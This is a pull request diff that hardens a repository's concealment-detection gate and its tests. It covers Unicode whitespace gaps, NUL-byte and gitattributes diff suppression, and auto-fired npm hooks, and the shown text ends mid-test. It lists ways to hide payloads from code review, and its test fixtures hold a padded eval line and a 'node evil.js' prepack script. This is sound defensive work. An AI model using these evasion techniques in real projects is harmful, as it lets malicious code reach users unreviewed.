### PR TITLE
fix(security): stop allowlisting what the concealment gate inspects

### DIFF
--- a/docs/index.html
+++ b/docs/index.html
@@ -342,7 +342,11 @@
   </div>
   <p>Connect your Copilot Money data to Claude, Cursor, Codex CLI, and more. This project is an independent integration — it is not built, endorsed, or supported by Copilot Money.</p>
   <div class="disclaimer">
-    <strong>Heads up:</strong> when you use this with an AI client (Claude, Cursor, Codex CLI, etc.), your Copilot Money data — transactions, balances, accounts — is sent to that AI provider so the model can answer your questions. This project has no servers and collects nothing, but the AI provider you choose is a third party that will see your financial data. Review their privacy policy before connecting.
+    <strong>Heads up:</strong> when you use this with an AI client (Claude, Cursor, Codex CLI,
+    etc.), your Copilot Money data — transactions, balances, accounts — is sent to that AI provider
+    so the model can answer your questions. This project has no servers and collects nothing, but
+    the AI provider you choose is a third party that will see your financial data. Review their
+    privacy policy before connecting.
   </div>
   <div class="hero-buttons">
     <a href="https://github.com/ignaciohermosillacornejo/copilot-money-mcp/releases" class="btn btn-primary">

--- a/scripts/check-concealment.ts
+++ b/scripts/check-concealment.ts
@@ -40,6 +40,7 @@
  *     quote the patterns they look for.
  */
 
+import { spawnSync } from 'child_process';
 import { readFileSync, readdirSync, statSync } from 'fs';
 import { dirname, join, relative, sep } from 'path';
 import { fileURLToPath } from 'url';
@@ -281,9 +282,13 @@ function invisibleIsBenign(cp: number, prev: number | undefined, next: number | 
   return prev !== undefined && next !== undefined && prev >= 0x2000 && next >= 0x2000;
 }
 
-function checkLine(rel: string, lineNo: number, line: string, exempt: boolean): void {
-  const prose = isProse(rel);
-
+function checkLine(
+  rel: string,
+  lineNo: number,
+  line: string,
+  exempt: boolean,
+  prose: boolean
+): void {
   if (!prose && line.length > CONCEALED_LINE && WHITESPACE_RUN_RE.test(line)) {
     report(
       rel,
@@ -378,7 +383,46 @@ function checkLifecycleScripts(contents: string, rel: string): void {
   }
 }
 
-const files = walk(ROOT, []);
+/**
+ * The set of files this gate inspects: everything git would show in a diff.
+ *
+ * Removing the extension allowlist (F2) put the whole working tree in scope,
+ * including trees git is told to ignore — `snapshots/`, a local
+ * `tests/fixtures/demo_database/`, `docs/graphql-capture/raw/`, `.env.local`.
+ * Two problems, both landing only on developer machines (CI is a clean
+ * checkout, which is why this was invisible in the PR run): a
+ * multi-hundred-MB LevelDB snapshot gets fully UTF-8-decoded into a JS string
+ * before the NUL check discards it, and a Firebase JWT in `.env.local` runs
+ * past MAX_LINE, failing the gate locally with a finding no PR can resolve.
+ *
+ * This is NOT a re-introduced allowlist. It is exactly the gate's threat
+ * model: content that can reach a reviewer's diff. And it cannot be used to
+ * evade the gate — adding a `.gitignore` entry does not untrack a file that
+ * is already committed, so anything in the repo stays in scope.
+ *
+ * Falls back to the filesystem walk outside a git repo, which is how the
+ * tests drive it (synthetic trees under CHECK_CONCEALMENT_ROOT). Both paths
+ * are covered: see 'file list' in tests/scripts/check-concealment.test.ts.
+ */
+function gitFiles(root: string): string[] | undefined {
+  const run = (args: string[]): string[] | undefined => {
+    const r = spawnSync('git', ['-C', root, ...args], { encoding: 'utf-8' });
+    if (r.status !== 0 || typeof r.stdout !== 'string') return undefined;
+    return r.stdout.split('\0').filter((line) => line !== '');
+  };
+  const tracked = run(['ls-files', '-z']);
+  if (tracked === undefined) return undefined;
+  // Untracked-but-not-ignored files can be `git add`ed into the next diff, so
+  // they are in scope too. Ignored files are not.
+  const untracked = run(['ls-files', '-z', '--others', '--exclude-standard']) ?? [];
+  return [...new Set([...tracked, ...untracked])].map((rel) => join(root, rel));
+}
+
+function listFiles(root: string): string[] {
+  return gitFiles(root) ?? walk(root, []);
+}
+
+const files = listFiles(ROOT).filter((f) => inScope(f));
 for (const file of files) {
   const rel = relative(ROOT, file);
   let contents: string;
@@ -390,8 +434,9 @@ for (const file of files) {
   if (contents.includes(NUL)) continue; // binary
 
   const exempt = SELF_EXEMPT.has(rel);
+  const prose = isProse(rel);
   const lines = contents.split('\n');
-  for (let i = 0; i < lines.length; i++) checkLine(rel, i + 1, lines[i], exempt);
+  for (let i = 0; i < lines.length; i++) checkLine(rel, i + 1, lines[i], exempt, prose);
 
   if (rel === 'package.json') checkLifecycleScripts(contents, rel);
 }

--- a/scripts/check-concealment.ts
+++ b/scripts/check-concealment.ts
@@ -41,7 +41,7 @@
  */
 
 import { spawnSync } from 'child_process';
-import { readFileSync, readdirSync, statSync } from 'fs';
+import { readFileSync, readdirSync, realpathSync, statSync } from 'fs';
 import { dirname, join, relative, sep } from 'path';
 import { fileURLToPath } from 'url';
 
@@ -405,11 +405,42 @@ function checkLifecycleScripts(contents: string, rel: string): void {
  * are covered: see 'file list' in tests/scripts/check-concealment.test.ts.
  */
 function gitFiles(root: string): string[] | undefined {
+  // Strip inherited git plumbing vars before shelling out. A pre-push hook runs
+  // with GIT_DIR set, and `git -C <dir>` does NOT override it — so without this,
+  // `git ls-files` inside a scratch directory silently answers about the AMBIENT
+  // repo and reports the scratch tree as untracked, bypassing SKIP_DIRS entirely.
+  // That is how this gate started reporting node_modules under husky while
+  // passing when run by hand. Caught by the pre-push hook it broke.
+  const env = { ...process.env };
+  for (const key of [
+    'GIT_DIR',
+    'GIT_WORK_TREE',
+    'GIT_INDEX_FILE',
+    'GIT_COMMON_DIR',
+    'GIT_OBJECT_DIRECTORY',
+    'GIT_ALTERNATE_OBJECT_DIRECTORIES',
+    'GIT_PREFIX',
+  ])
+    delete env[key];
+
   const run = (args: string[]): string[] | undefined => {
-    const r = spawnSync('git', ['-C', root, ...args], { encoding: 'utf-8' });
+    const r = spawnSync('git', ['-C', root, ...args], { encoding: 'utf-8', env });
     if (r.status !== 0 || typeof r.stdout !== 'string') return undefined;
     return r.stdout.split('\0').filter((line) => line !== '');
   };
+
+  // Belt to that braces: only trust git listing when `root` is itself the repo
+  // root. If root is a subdirectory of some unrelated repo, its answer would be
+  // scoped to that repo's rules rather than to the tree we were asked to scan.
+  const top = run(['rev-parse', '--show-toplevel']);
+  if (top === undefined || top.length === 0) return undefined;
+  try {
+    const topReal = realpathSync((top[0] ?? '').trim());
+    if (topReal !== realpathSync(root)) return undefined;
+  } catch {
+    return undefined;
+  }
+
   const tracked = run(['ls-files', '-z']);
   if (tracked === undefined) return undefined;
   // Untracked-but-not-ignored files can be `git add`ed into the next diff, so

--- a/scripts/check-concealment.ts
+++ b/scripts/check-concealment.ts
@@ -50,7 +50,7 @@ const __dirname = dirname(fileURLToPath(import.meta.url));
 // same pattern as CHECK_PRIVACY_ENDPOINTS_ROOT and CHECK_TOOL_COUNTS_ROOT.
 const ROOT = process.env.CHECK_CONCEALMENT_ROOT ?? join(__dirname, '..');
 
-/** A run of this many spaces or tabs mid-line is the concealment gap. */
+/** A run of this many space characters (ASCII or unicode) mid-line is the gap. */
 const WHITESPACE_RUN = 20;
 /**
  * ...but only when the line is longer than a viewport, because that is what
@@ -93,8 +93,7 @@ const SKIP_DIRS = new Set([
 const PROSE_EXTENSIONS = new Set(['.md', '.txt', '.rst']);
 
 function isProse(rel: string): boolean {
-  const dot = rel.lastIndexOf('.');
-  return dot > 0 && PROSE_EXTENSIONS.has(rel.slice(dot));
+  return PROSE_EXTENSIONS.has(extensionOf(rel));
 }
 
 /**
@@ -109,8 +108,11 @@ function isProse(rel: string): boolean {
  * failed. The live exposure was `.husky/pre-push`, which has no extension at
  * all and runs on every developer push.
  *
- * Every text file is now in scope. Binaries need no extension rule: the main
- * loop already skips anything containing a NUL byte.
+ * Every text file is now in scope. Binaries are handled by BINARY_EXTENSIONS
+ * below plus a NUL check — note that combination carefully: a NUL is NOT on its
+ * own a reason to skip, because a NUL-bearing module still executes while git
+ * shows the reviewer nothing. Only a NUL in a file whose extension says it
+ * should be binary is skipped quietly; anywhere else it is reported.
  */
 
 /** Generated, enormous, and not human-reviewed; a different gate covers them. */
@@ -140,9 +142,15 @@ const BINARY_EXTENSIONS = new Set([
   '.mcpb', '.node', '.wasm', '.ldb', '.sst', '.dylib', '.so', '.dll', '.exe',
 ]);
 
+/** Extension of the BASENAME — `docs/v1.2/README` has no extension, not `.2/README`. */
+function extensionOf(rel: string): string {
+  const name = rel.slice(rel.lastIndexOf(sep) + 1);
+  const dot = name.lastIndexOf('.');
+  return dot > 0 ? name.slice(dot).toLowerCase() : '';
+}
+
 function isExpectedBinary(rel: string): boolean {
-  const dot = rel.lastIndexOf('.');
-  return dot > 0 && BINARY_EXTENSIONS.has(rel.slice(dot).toLowerCase());
+  return BINARY_EXTENSIONS.has(extensionOf(rel));
 }
 
 /**
@@ -334,8 +342,10 @@ function checkLine(
       rel,
       lineNo,
       'whitespace run',
-      `${WHITESPACE_RUN}+ spaces or tabs mid-line on a ${line.length}-column line — ` +
-        `the tail is off-screen in a diff`
+      `${WHITESPACE_RUN}+ consecutive space characters mid-line on a ${line.length}-column ` +
+        `line — the tail is off-screen in a diff. Unicode spaces (NBSP, U+2003, U+3000, ...) ` +
+        `count as well as ASCII space and tab: they render identically and are valid ` +
+        `ECMAScript whitespace`
     );
   }
 
@@ -360,6 +370,42 @@ function checkLine(
   for (const [re, label] of DYNAMIC_EXEC) {
     if (re.test(line)) report(rel, lineNo, 'dynamic execution', label);
   }
+}
+
+/**
+ * Attributes that make git or GitHub show a reviewer less than the content.
+ * Same class as the NUL bypass — "ways to make git render nothing" — reached
+ * with no NUL, no long line, no whitespace run, no dynamic-execution
+ * construct. One tracked line does it:
+ *
+ *     src/payload.ts binary
+ *
+ * `binary` implies `-diff`, so git and GitHub print "Binary files ... differ"
+ * instead of the content. `linguist-generated=true` collapses the file behind a
+ * "Load diff" fold in the Files-changed view — the view maintainers review from.
+ *
+ * Refused rather than allow-listed, for the reason this gate keeps relearning:
+ * the legitimate entries (`text=auto`, `eol=lf`, `linguist-language=...`) do
+ * not hide content, so none of them needs an exemption.
+ */
+const DIFF_SUPPRESSING_ATTRS = [/(^|\s)binary(\s|$)/, /(^|\s)-diff(\s|$)/, /linguist-generated/];
+
+function checkGitAttributes(contents: string, rel: string): void {
+  contents.split('\n').forEach((line, i) => {
+    const stripped = line.replace(/#.*$/, '').trim();
+    if (stripped === '') return;
+    for (const re of DIFF_SUPPRESSING_ATTRS) {
+      if (!re.test(stripped)) continue;
+      report(
+        rel,
+        i + 1,
+        'diff-suppressing gitattribute',
+        `"${stripped}" stops git or GitHub showing this path's content in a diff, so a payload ` +
+          `in it reaches main without a reviewer ever seeing the lines`
+      );
+      return;
+    }
+  });
 }
 
 function checkLifecycleScripts(contents: string, rel: string): void {
@@ -490,7 +536,15 @@ function gitFiles(root: string): string[] | undefined {
 }
 
 function listFiles(root: string): string[] {
-  return gitFiles(root) ?? walk(root, []);
+  const fromGit = gitFiles(root);
+  if (fromGit === undefined) return walk(root, []);
+  // `git ls-files` does not traverse directories, so SKIP_DIRS never applied on
+  // this path — a tracked file under a vendored directory would be scanned here
+  // but skipped by the walk. Apply the same exclusions to both, so behaviour
+  // does not depend on which path ran.
+  return fromGit.filter(
+    (file) => !relative(root, file).split(sep).some((segment) => SKIP_DIRS.has(segment))
+  );
 }
 
 const files = listFiles(ROOT).filter((f) => inScope(f));
@@ -528,6 +582,9 @@ for (const file of files) {
   // postinstall is the same exposure with a longer path.
   if (rel === 'package.json' || rel.endsWith(`${sep}package.json`)) {
     checkLifecycleScripts(contents, rel);
+  }
+  if (rel === '.gitattributes' || rel.endsWith(`${sep}.gitattributes`)) {
+    checkGitAttributes(contents, rel);
   }
 }
 

--- a/scripts/check-concealment.ts
+++ b/scripts/check-concealment.ts
@@ -73,12 +73,41 @@ const SKIP_DIRS = new Set([
   '.turbo',
 ]);
 
-/** Executed or interpreted at some point: install, build, test, CI, or runtime. */
-const SCOPED_EXTENSIONS = new Set([
-  '.ts', '.tsx', '.js', '.jsx', '.mjs', '.cjs',
-  '.json', '.yml', '.yaml', '.toml',
-  '.sh', '.bash', '.zsh', '.py',
-]);
+/**
+ * Prose. These are never executed, so the rules about hiding CODE off the right
+ * edge of a diff (long line, whitespace run) and about dynamic execution do not
+ * apply — a 900-column paragraph in a CHANGELOG is a paragraph, and a doc that
+ * quotes `execSync` is documentation. Invisible characters are still flagged
+ * here, since a zero-width character in prose is never benign.
+ *
+ * Note which way this allowlist fails. Forgetting to list a prose extension
+ * means that file gets the FULL rule set — more scrutiny, and at worst a false
+ * positive a human resolves. That is the opposite of the extension allowlist
+ * this replaced (F2), where forgetting an extension meant no scrutiny at all.
+ * An allowlist is only safe when omission fails toward suspicion.
+ */
+const PROSE_EXTENSIONS = new Set(['.md', '.mdx', '.txt', '.rst']);
+
+function isProse(rel: string): boolean {
+  const dot = rel.lastIndexOf('.');
+  return dot > 0 && PROSE_EXTENSIONS.has(rel.slice(dot));
+}
+
+/**
+ * NOTE: there is deliberately no extension allowlist here any more.
+ *
+ * There was one — 14 entries, "executed or interpreted at some point". An
+ * audit (docs/audits/2026-08-29-completeness-guard-audit.md, F2) showed it
+ * was the same bug this gate exists to catch: it enumerated what to CHECK
+ * rather than what to SKIP, so anything it forgot was invisible. A concealed
+ * payload (long line, whitespace run, execSync of a piped curl) written to
+ * `scripts/probe-hook` passed; the identical bytes in `scripts/probe.ts`
+ * failed. The live exposure was `.husky/pre-push`, which has no extension at
+ * all and runs on every developer push.
+ *
+ * Every text file is now in scope. Binaries need no extension rule: the main
+ * loop already skips anything containing a NUL byte.
+ */
 
 /** Generated, enormous, and not human-reviewed; a different gate covers them. */
 const SKIP_FILES = new Set(['package-lock.json', 'bun.lock', 'bun.lockb', 'yarn.lock']);
@@ -123,7 +152,41 @@ const GENERATED_RE = /\.generated\.[cm]?[jt]sx?$/;
  * pinned names are derived from the map so a hook can never be listed as pinned
  * without a value to pin it to.
  */
-const FORBIDDEN_LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepublish'];
+/**
+ * Every npm hook that fires WITHOUT being named on the command line. npm runs
+ * these as a side effect of install, publish, pack, version, uninstall or
+ * shrinkwrap, so a payload in any of them executes before anyone reads it.
+ *
+ * This list is the inversion of what used to be here. The old constant named
+ * four hooks to refuse; the audit (F1) added `prepack` — which npm runs during
+ * `npm publish`, inside the job that holds `id-token: write` — and the gate
+ * reported "nothing hidden". Enumerating the attack was the bug. The rule is
+ * now: any auto-fired hook is refused unless it is pinned to an exact reviewed
+ * value in PINNED_LIFECYCLE.
+ *
+ * Deliberately excluded: `test`, `start`, `stop`, `restart`. npm gives those
+ * names meaning only when you invoke them directly (`npm test`), and this repo
+ * defines `test`. Their pre/post wrappers ARE auto-fired and are listed.
+ */
+const AUTO_LIFECYCLE = new Set([
+  // install
+  'preinstall', 'install', 'postinstall', 'dependencies',
+  // publish + pack
+  'prepublish', 'prepublishOnly', 'prepack', 'postpack', 'publish', 'postpublish',
+  // prepare runs on install AND publish
+  'prepare',
+  // version
+  'preversion', 'version', 'postversion',
+  // uninstall
+  'preuninstall', 'uninstall', 'postuninstall',
+  // shrinkwrap
+  'preshrinkwrap', 'shrinkwrap', 'postshrinkwrap',
+  // wrappers around the explicitly-invoked commands
+  'pretest', 'posttest',
+  'prestart', 'poststart',
+  'prestop', 'poststop',
+  'prerestart', 'postrestart',
+]);
 const PINNED_LIFECYCLE: Record<string, string> = {
   prepare: 'husky',
   prepublishOnly: 'bun run clean && bun run build && bun test',
@@ -176,9 +239,7 @@ function report(file: string, line: number, rule: string, detail: string): void 
 
 function inScope(path: string): boolean {
   const name = path.slice(path.lastIndexOf(sep) + 1);
-  if (SKIP_FILES.has(name)) return false;
-  const dot = name.lastIndexOf('.');
-  return dot > 0 && SCOPED_EXTENSIONS.has(name.slice(dot));
+  return !SKIP_FILES.has(name);
 }
 
 function walk(dir: string, out: string[]): string[] {
@@ -221,7 +282,9 @@ function invisibleIsBenign(cp: number, prev: number | undefined, next: number | 
 }
 
 function checkLine(rel: string, lineNo: number, line: string, exempt: boolean): void {
-  if (line.length > CONCEALED_LINE && WHITESPACE_RUN_RE.test(line)) {
+  const prose = isProse(rel);
+
+  if (!prose && line.length > CONCEALED_LINE && WHITESPACE_RUN_RE.test(line)) {
     report(
       rel,
       lineNo,
@@ -231,7 +294,7 @@ function checkLine(rel: string, lineNo: number, line: string, exempt: boolean): 
     );
   }
 
-  if (line.length > MAX_LINE && !GENERATED_RE.test(rel)) {
+  if (!prose && line.length > MAX_LINE && !GENERATED_RE.test(rel)) {
     report(rel, lineNo, 'long line', `${line.length} columns (limit ${MAX_LINE})`);
   }
 
@@ -248,7 +311,7 @@ function checkLine(rel: string, lineNo: number, line: string, exempt: boolean): 
     );
   }
 
-  if (exempt) return;
+  if (exempt || prose) return;
   for (const [re, label] of DYNAMIC_EXEC) {
     if (re.test(line)) report(rel, lineNo, 'dynamic execution', label);
   }
@@ -268,15 +331,36 @@ function checkLifecycleScripts(contents: string, rel: string): void {
     return idx >= 0 ? idx + 1 : 1;
   };
 
-  for (const hook of FORBIDDEN_LIFECYCLE) {
+  // Discover, do not enumerate: walk the scripts that actually exist and refuse
+  // any that npm fires on its own. A hook nobody thought of is caught by being
+  // auto-fired, not by having been predicted.
+  for (const hook of Object.keys(scripts)) {
+    if (!AUTO_LIFECYCLE.has(hook)) continue;
+    if (PINNED_NAMES.includes(hook)) continue; // checked against its pinned value below
     const value = scripts[hook];
     if (value === undefined) continue;
     report(
       rel,
       lineOf(hook),
-      'install-time script',
-      `"${hook}": ${JSON.stringify(value)} runs on every machine that installs this ` +
-        `package, consumers included, before anyone reads the code`
+      'auto-fired lifecycle script',
+      `"${hook}": ${JSON.stringify(value)} is run by npm without being named on the ` +
+        `command line (install, publish, pack, version, uninstall or shrinkwrap), so it ` +
+        `executes before anyone reads the code`
+    );
+  }
+
+  // The general form of the same hole: npm auto-runs `preX`/`postX` around any
+  // script X, so a wrapper around an existing script fires implicitly too.
+  for (const hook of Object.keys(scripts)) {
+    if (AUTO_LIFECYCLE.has(hook) || PINNED_NAMES.includes(hook)) continue;
+    const base = hook.startsWith('pre') ? hook.slice(3) : hook.startsWith('post') ? hook.slice(4) : '';
+    if (base === '' || scripts[base] === undefined) continue;
+    report(
+      rel,
+      lineOf(hook),
+      'auto-fired lifecycle script',
+      `"${hook}": ${JSON.stringify(scripts[hook])} is run automatically by npm around ` +
+        `"${base}", so it executes whenever that script does`
     );
   }
 

--- a/scripts/check-concealment.ts
+++ b/scripts/check-concealment.ts
@@ -87,7 +87,10 @@ const SKIP_DIRS = new Set([
  * this replaced (F2), where forgetting an extension meant no scrutiny at all.
  * An allowlist is only safe when omission fails toward suspicion.
  */
-const PROSE_EXTENSIONS = new Set(['.md', '.mdx', '.txt', '.rst']);
+// `.mdx` is deliberately NOT here: it compiles to JS/JSX and can carry
+// executable expressions, so it must keep the code-shaped rules. No MDX
+// pipeline exists today; listing it would have been a hole waiting for one.
+const PROSE_EXTENSIONS = new Set(['.md', '.txt', '.rst']);
 
 function isProse(rel: string): boolean {
   const dot = rel.lastIndexOf('.');
@@ -112,6 +115,35 @@ function isProse(rel: string): boolean {
 
 /** Generated, enormous, and not human-reviewed; a different gate covers them. */
 const SKIP_FILES = new Set(['package-lock.json', 'bun.lock', 'bun.lockb', 'yarn.lock']);
+
+/**
+ * Extensions where a NUL byte is expected, because the file genuinely is
+ * binary. Everything else containing a NUL is REPORTED rather than skipped.
+ *
+ * A NUL used to be an unconditional free pass: the main loop skipped any file
+ * containing one as "binary". But a module with a NUL byte tucked inside a
+ * comment or string literal still runs under bun and node — NUL-containing is
+ * not the same as non-executable —
+ * while git renders the whole file as `Binary files ... differ`, so the
+ * reviewer sees nothing at all. That is strictly better concealment than the
+ * off-screen trick this gate was built for.
+ *
+ * Note the direction: forgetting an extension here means a real binary gets
+ * reported and a human adds it. The reverse — the old behaviour — meant a
+ * payload ran with nobody looking.
+ */
+const BINARY_EXTENSIONS = new Set([
+  '.png', '.jpg', '.jpeg', '.gif', '.webp', '.ico', '.icns', '.bmp', '.tiff',
+  '.pdf', '.zip', '.gz', '.tgz', '.bz2', '.xz', '.7z', '.tar',
+  '.woff', '.woff2', '.ttf', '.otf', '.eot',
+  '.mp3', '.mp4', '.wav', '.mov', '.webm', '.ogg',
+  '.mcpb', '.node', '.wasm', '.ldb', '.sst', '.dylib', '.so', '.dll', '.exe',
+]);
+
+function isExpectedBinary(rel: string): boolean {
+  const dot = rel.lastIndexOf('.');
+  return dot > 0 && BINARY_EXTENSIONS.has(rel.slice(dot).toLowerCase());
+}
 
 /**
  * Built from a char code rather than written literally: an actual NUL byte in
@@ -216,7 +248,15 @@ const INVISIBLE: Record<number, string> = {
   0xfeff: 'ZERO WIDTH NO-BREAK SPACE',
 };
 
-const WHITESPACE_RUN_RE = new RegExp(`\\S[ \\t]{${WHITESPACE_RUN},}\\S`);
+/**
+ * The gap characters. `[ \t]` alone was defeatable: U+00A0 NBSP, U+202F narrow
+ * NBSP, U+2003 em space and U+3000 ideographic space are all valid ECMAScript
+ * whitespace, all render as blank horizontal space, and none were matched — so
+ * a payload could be pushed off the right edge without tripping this rule.
+ * Unicode Zs plus the format-ish spaces that behave the same way.
+ */
+const GAP_CHARS = ' \\t\\u00a0\\u1680\\u2000-\\u200a\\u202f\\u205f\\u3000';
+const WHITESPACE_RUN_RE = new RegExp(`\\S[${GAP_CHARS}]{${WHITESPACE_RUN},}\\S`);
 
 const DYNAMIC_EXEC: Array<[RegExp, string]> = [
   [/(?<![\w$.])eval\s*\(/, 'eval() call'],
@@ -462,14 +502,33 @@ for (const file of files) {
   } catch {
     continue;
   }
-  if (contents.includes(NUL)) continue; // binary
+  if (contents.includes(NUL)) {
+    // Not "binary, therefore safe" — see BINARY_EXTENSIONS. A NUL in a file
+    // that is not an expected binary is itself the concealment: it makes git
+    // show the reviewer nothing while the module still executes.
+    if (!isExpectedBinary(rel)) {
+      report(
+        rel,
+        1,
+        'NUL byte in a non-binary file',
+        'a NUL makes git render the whole file as binary — no diff for a reviewer to read — ' +
+          'while the module still executes'
+      );
+    }
+    continue;
+  }
 
   const exempt = SELF_EXEMPT.has(rel);
   const prose = isProse(rel);
   const lines = contents.split('\n');
   for (let i = 0; i < lines.length; i++) checkLine(rel, i + 1, lines[i], exempt, prose);
 
-  if (rel === 'package.json') checkLifecycleScripts(contents, rel);
+  // Any package.json, not just the root one: workspace installs run
+  // sub-package lifecycle scripts too, so `packages/x/package.json` with a
+  // postinstall is the same exposure with a longer path.
+  if (rel === 'package.json' || rel.endsWith(`${sep}package.json`)) {
+    checkLifecycleScripts(contents, rel);
+  }
 }
 
 if (findings.length === 0) {

--- a/tests/scripts/check-concealment.test.ts
+++ b/tests/scripts/check-concealment.test.ts
@@ -197,6 +197,94 @@ describe('scope', () => {
 // F1 and F2). Both were the same defect this gate exists to catch: the gate
 // enumerated what to CHECK instead of what to SKIP, so anything it had not
 // predicted was invisible.
+/**
+ * The gate lists files from git when it can, falling back to a filesystem walk
+ * outside a repo. Every other test in this file drives the FALLBACK, because
+ * withTree builds a plain temp directory — so without this block the path that
+ * actually runs in production would be untested, which is the same shape of
+ * hole the audit that prompted these tests was about.
+ */
+describe('file list comes from git when available (review follow-up)', () => {
+  const concealed = `echo ok${' '.repeat(60)}eval("x")${' # '}${'x'.repeat(80)}\n`;
+
+  async function withGitTree(
+    files: Record<string, string>,
+    assertions: (result: Result) => void | Promise<void>,
+    // Written AFTER the commit. `git add -A` honours .gitignore, so a file
+    // listed in it at seed time is never tracked at all — which is a different
+    // scenario from "tracked, then later ignored".
+    afterCommit: Record<string, string> = {}
+  ): Promise<void> {
+    const dir = await mkdtemp(join(tmpdir(), 'concealment-git-'));
+    try {
+      for (const [name, contents] of Object.entries(files)) {
+        const path = join(dir, name);
+        await mkdir(join(path, '..'), { recursive: true });
+        await writeFile(path, contents);
+      }
+      const git = (...args: string[]): void => {
+        const r = Bun.spawnSync(['git', '-C', dir, ...args]);
+        if (r.exitCode !== 0) throw new Error(`git ${args.join(' ')} failed`);
+      };
+      git('init', '-q');
+      git('config', 'user.email', 'test@example.com');
+      git('config', 'user.name', 'test');
+      git('add', '-A');
+      git('commit', '-qm', 'seed', '--no-gpg-sign');
+      for (const [name, contents] of Object.entries(afterCommit)) {
+        const path = join(dir, name);
+        await mkdir(join(path, '..'), { recursive: true });
+        await writeFile(path, contents);
+      }
+      await assertions(await runCheck(dir));
+    } finally {
+      await rm(dir, { recursive: true, force: true });
+    }
+  }
+
+  test('a gitignored tree is not scanned', async () => {
+    // The real exposure: removing the extension allowlist put snapshots/,
+    // local fixture databases and .env.local in scope on developer machines.
+    // Decoding a multi-hundred-MB LevelDB blob to a string before the NUL
+    // check discards it is wasteful, and a long JWT line in .env.local would
+    // fail the gate with a finding no PR could resolve.
+    await withGitTree(
+      { '.gitignore': 'secrets/\n', 'src/a.ts': 'const a = 1;\n', 'secrets/blob.ts': concealed },
+      ({ code }) => expect(code).toBe(0)
+    );
+  });
+
+  test('a tracked file is still scanned', async () => {
+    await withGitTree({ 'src/a.ts': concealed }, ({ code, stderr }) => {
+      expect(code).toBe(1);
+      expect(stderr).toContain('src/a.ts');
+    });
+  });
+
+  test('an untracked but unignored file is scanned — it can still reach a diff', async () => {
+    await withGitTree(
+      { 'src/a.ts': 'const a = 1;\n', 'src/added-later.ts': concealed },
+      ({ code, stderr }) => {
+        expect(code).toBe(1);
+        expect(stderr).toContain('added-later');
+      }
+    );
+  });
+
+  test('gitignoring an already-tracked file does not hide it', async () => {
+    // The property that makes this not an allowlist: .gitignore cannot be used
+    // to evade the gate, because ignoring a committed file does not untrack it.
+    await withGitTree(
+      { 'src/a.ts': concealed },
+      ({ code, stderr }) => {
+        expect(code).toBe(1);
+        expect(stderr).toContain('src/a.ts');
+      },
+      { '.gitignore': 'src/a.ts\n' }
+    );
+  });
+});
+
 describe('scope is not an extension allowlist (audit F2)', () => {
   const concealed = `echo ok${' '.repeat(60)}eval("x")${' # '}${'x'.repeat(80)}\n`;
 

--- a/tests/scripts/check-concealment.test.ts
+++ b/tests/scripts/check-concealment.test.ts
@@ -451,6 +451,40 @@ describe('nested manifests and .mdx (Fable review)', () => {
   });
 });
 
+describe('diff-suppressing gitattributes (Fable review, item 1)', () => {
+  test.each([
+    ['binary', 'src/payload.ts binary'],
+    ['-diff', 'src/payload.ts -diff'],
+    ['linguist-generated', 'src/payload.ts linguist-generated=true'],
+  ])('flags %s', async (_label, line) => {
+    // The same class as the NUL bypass reached without a NUL: one tracked
+    // .gitattributes line makes git and GitHub print "Binary files differ" (or
+    // fold the diff), so the payload file itself can be plain, valid,
+    // NUL-free TypeScript and every other rule in this gate passes.
+    await withTree(
+      { '.gitattributes': `${line}\n`, 'src/payload.ts': 'const a = 1;\n' },
+      ({ code, stderr }) => {
+        expect(code).toBe(1);
+        expect(stderr).toContain('gitattribute');
+      }
+    );
+  });
+
+  test('leaves the legitimate attributes alone', async () => {
+    // text=auto / eol=lf / linguist-language do not hide content, which is why
+    // the rule refuses the suppressing attributes rather than allow-listing
+    // the safe ones.
+    const attrs = '* text=auto eol=lf\n*.ts linguist-language=TypeScript\n# a comment\n';
+    await withTree({ '.gitattributes': attrs }, ({ code }) => expect(code).toBe(0));
+  });
+
+  test('checks a nested .gitattributes too', async () => {
+    await withTree({ 'src/.gitattributes': 'payload.ts binary\n' }, ({ code }) =>
+      expect(code).toBe(1)
+    );
+  });
+});
+
 describe('invisible characters', () => {
   test('flags a zero-width space', async () => {
     await withTree({ 'src/a.ts': `const a${ZWSP} = 1;\n` }, ({ code, stderr }) => {

--- a/tests/scripts/check-concealment.test.ts
+++ b/tests/scripts/check-concealment.test.ts
@@ -192,6 +192,85 @@ describe('scope', () => {
   });
 });
 
+// Regression cover for the two allowlist holes found by the 2026-08-29
+// completeness-guard audit (docs/audits/2026-08-29-completeness-guard-audit.md
+// F1 and F2). Both were the same defect this gate exists to catch: the gate
+// enumerated what to CHECK instead of what to SKIP, so anything it had not
+// predicted was invisible.
+describe('scope is not an extension allowlist (audit F2)', () => {
+  const concealed = `echo ok${' '.repeat(60)}eval("x")${' # '}${'x'.repeat(80)}\n`;
+
+  test('scans a file with no extension at all', async () => {
+    // The live exposure was .husky/pre-push, which runs on every developer
+    // push. Under the old SCOPED_EXTENSIONS allowlist, inScope() required a
+    // dot, so an extensionless file was never opened.
+    await withTree({ 'scripts/pre-push': concealed }, ({ code, stderr }) => {
+      expect(code).toBe(1);
+      expect(stderr).toContain('pre-push');
+    });
+  });
+
+  test('scans an extension nobody thought to allowlist', async () => {
+    await withTree({ 'scripts/probe.rb': concealed }, ({ code }) => expect(code).toBe(1));
+  });
+
+  test('prose keeps the invisible-character rule', async () => {
+    // Relaxing prose must not relax it into a blind spot: a zero-width
+    // character in a README is never benign.
+    await withTree({ 'README.md': `Hello${ZWSP} world\n` }, ({ code, stderr }) => {
+      expect(code).toBe(1);
+      expect(stderr).toContain('U+200B');
+    });
+  });
+
+  test('prose is exempt from the code-shaped rules', async () => {
+    // A long paragraph in a CHANGELOG is a paragraph, and a doc that quotes
+    // eval() is documentation. Markdown is not executed.
+    await withTree({ 'CHANGELOG.md': `${'word '.repeat(200)}eval(x)\n` }, ({ code }) =>
+      expect(code).toBe(0)
+    );
+  });
+});
+
+describe('auto-fired lifecycle scripts (audit F1)', () => {
+  test('flags prepack, which runs during npm publish', async () => {
+    // The finding: prepack was absent from the old four-name FORBIDDEN_LIFECYCLE
+    // list, and npm runs it inside the publish job that holds id-token: write.
+    const pkg = JSON.stringify({ scripts: { prepack: 'node evil.js' } });
+    await withTree({ 'package.json': pkg }, ({ code, stderr }) => {
+      expect(code).toBe(1);
+      expect(stderr).toContain('prepack');
+    });
+  });
+
+  test.each(['postpack', 'dependencies', 'preversion', 'postpublish', 'preuninstall'])(
+    'flags %s',
+    async (hook) => {
